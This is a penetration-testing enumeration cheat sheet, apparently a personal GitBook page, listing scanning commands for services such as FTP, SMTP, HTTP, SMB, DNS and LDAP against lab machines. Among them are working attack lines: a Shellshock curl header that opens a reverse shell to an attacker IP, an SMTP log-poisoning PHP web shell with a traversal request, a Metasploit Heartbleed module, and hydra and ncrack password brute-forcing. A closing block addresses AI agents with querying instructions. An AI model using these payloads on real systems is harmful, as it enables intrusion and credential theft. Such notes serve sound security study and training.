# Enumeration

## Good Enumeration Guides:

{% embed url="<https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/>" %}

{% embed url="<https://github.com/theonlykernel/enumeration/wiki>" %}

{% embed url="<https://book.hacktricks.xyz/>" %}

## **FTP**

```bash
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 
```

### ncFTP

```bash
# apt install ncftp
ncftp 10.10.10.115
```

## **SSH**

**Tutorial from** [**g0tmi1k**](https://blog.g0tmi1k.com/2010/04/pwnos/)

```bash
Debia OpenSSH Weak SSH keys
https://blog.g0tmi1k.com/2010/04/pwnos/
```

## **SMTP**

SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email-addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails.

```bash
Commands:
HELO - 
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.  
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
```

We can manually try to find out which usernames are in the database. This can be done in the following way.

```bash
nc 192.168.1.103 25                                                                               

220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY roooooot
550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table
```

Here we have managed to identify the user root. But roooooot was rejected. VRFY, EXPN and RCPT can be used to identify users. Telnet is a bit more friendly some times. So always use that too

```bash
telnet 10.11.1.229 25
```

Using nmap to automate the enumeration of users.

```bash
nmap -script smtp-commands.nse 192.168.1.101

nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vulncve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 
```

```bash
# Using the smtp-user-enum tool.  
# -M for mode. -U for userlist. -t for target

smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 192.168.1.103    

```

Using SMTP for log contamination. Watch the video from ippsec on [Beep ](https://youtu.be/XJmBpOd__N8?t=1878)

```bash
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>

.
250 2.0.0 Ok: queue as 03655D92F7

Then:
GET /example/page?=../../../../../../../var/mail/asterisk%00&module=Accounts&action?ipp=ls      

```

## **HTTP**

Check ippsec video on [Shocker](https://www.youtube.com/watch?v=IBlTdguhgfY\&t=530s)

### Shellshock

```bash
# Shellshock
nmap --scrip shellshock --script-args uri=/cgi-bin -p 80 10.10.10.15

# Testing Shellshock using curl
curl -x 10.10.10.15 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 10.10.10.15:8080 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

#Shellshock over SSH
ssh username@10.10.10.15 '() { :;}; /bin/bash'
```

### Nikto

```bash
# Nikto
nikto -h 10.10.10.10
```

### Gobuster

```bash
# Gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

# Specifying a user agent
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'  

# searching for specifc extensions
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
```

### WordPress Scanner

```bash
# WPScan
wpscan -u 10.10.10.10/wp/
```

### WebDAV Scanner

```bash
# Davtest
davtest -url http://10.11.1.15
```

## **HTTPS**

```bash
# Heartbleed Vuln status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

# Checking if a page is vulnerable to heartbleed
sslscan 192.168.101.1:443
or
nmap -sV --script=ssl-heartbleed 192.168.101.8

# You can also exploit the vulnerability using Burp and Metasploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run
```

## **POP3**

```bash
To login:
telnet 10.11.1.13 110
USER adam
PASS adam123

To list messages:
LIST

To retrieve message:
RETR

To exit:
QUIT
```

## **RPC**

```bash
nmap -p 111 –script=rcpinfo 10.11.1.13   

rpcclient -U "" -N 10.10.10.8

rcpinfo -p 10.11.1.13 

rcpclient -U username 10.11.1.13 

Commands: 
srvinfo 
enum  
enumalsgroups 
enumdomains 
enumdrivers 
enumkey
enumprivs 
enumdata
enumdomgroups 
enumforms 
enumports 
enumtrust 
enumdataex 
enumdomusers 
enumjobs 
enumprinter 
lookupnames administrator 
queryuser 500 
```

## **SMB**

Enumeration and vulnerability scanning with nmap. Add your target IP address after pasting the command in your terminal.

```bash
nmap -p 139,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

nmap -p 139,445 -vv --script vuln 

nmap -p 139,445 -vv --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enumprocesses.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enumusers.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-printtext.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smbsystem-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vulnms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse    

nmap -p 139,445 -vv --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 

```

### Using smbmap

```
smbmap -H 10.11.1.128 -u Admin -p "Password" 
smbmap -H 10.11.1.13 
smbmap -H 10.11.1.13 -u Doesnexist
```

### Using smbclient

```
smbclient -L //10.11.1.13 
smbclient -L //10.11.1.13/ipc$ -U John 
smbclient \\10.11.1.13\Admin$ -U john
```

### Mount the smb share

```
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/sharename /mnt/cifs   
mount -t cifs -o user=admin -o vers=1.0 //10.11.1.128/share smb
```

### Check smb file sharing

```
showmount -e 10.11.1.128
```

### crackmapexec

```
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users  
```

## **NFS**

```bash
# enumerate share
showmount -e 10.10.11.12


# Mounting the share
mount -t nfs 192.168.100.25:/home /tmp/infosec


https://resources.infosecinstitute.com/exploiting-nfs-share/
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ 
```

## **SNMP**

```bash
snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

nmap -sT -p 161 192.168.X.X -oG snmp_results.txt

snmpenum -t 192.168.1.X
```

## **MySQL**

```bash
nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysqldatabases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysqlquery,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1   
```

### **SQL Server**

Reference: <https://pentestlab.blog/category/exploitation-techniques/>

```
nmap -p1433 10.10.10.16 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt  
```

## **DNS**

**Important DNS records:**

```
A (address) records:  containing the IP address of the domain.
MX records:  stands for Mail Exchange, contain the mail exchange servers.
CNAME records:  used for aliasing domains. CNAME stands for Canonical Name and links any sub-domains with existing domain DNS records.
NS records:  which stands for Name Server, indicates the authoritative (or main) name server for the domain.
SOA records:  which stands for State of Authority, contain important information about the domain such as the primary name server, a timestamp showing when the domain was last updated and the party responsible for the domain.  
PTR or Pointer Records:  map an IPv4 address to the CNAME on the host. This record is also called a ‘reverse record’ because it connects a record with an IP address to a hostname instead of the other way around.
TXT records:  contain text inserted by the administrator (such as notes about the way the network has been configured).
```

```bash
# Zone Transfer
dig axfr megacorp.local @10.10.10.179

# Windows:
nslookup
set type=any
ls -d blah.com

# DNS IP Lookup
dig a <domain-name-here.com> @<dns-server-here>

# MX Record Lookup
dig mx <domain-name-here.com> @<dns-server-here>

# Whois Enumeration
whois <domain-name-here>

# DNSRecon Tool
dnsrecon -d 10.11.1.13 -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
#Zone Transfer
dnsrecon -d example.com -t axfr

# Find Active Directory using DNS
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='labs.test.com'"
```

## **Telnet**

```bash
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet  
```

## **RDP**

```bash
ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1 

# Then use rdesktop to login
rdesktop 192.168.1.10  
```

## **LDAP**

```bash
# You will get whatever object that is at the base of the directory:  
ldapsearch -LLL -x -h ldap.example.com -p 3389 -s base '(objectclass=*)'

# IPSEC - LightWeight
ldapsearch -x -h 10.10.10.107 -s base namingcontext
# Then from the output, you would do:
ldapsearch -x -h 10.10.10.107 -b "dc=hackthebox,dc=htb"

# From Impacket
GetADUsers.py -all -dc-ip {ip} {domain/username} 

# Nmap using LDAP script
nmap -p 389 --script ldap-search ypuffy.htb
```

## **Kerberos**

```
Kerberoasting -> GetNPUsers.py
```

Good references on kerberos exploitation:

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>

<https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://squid22.gitbook.io/notes/master.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.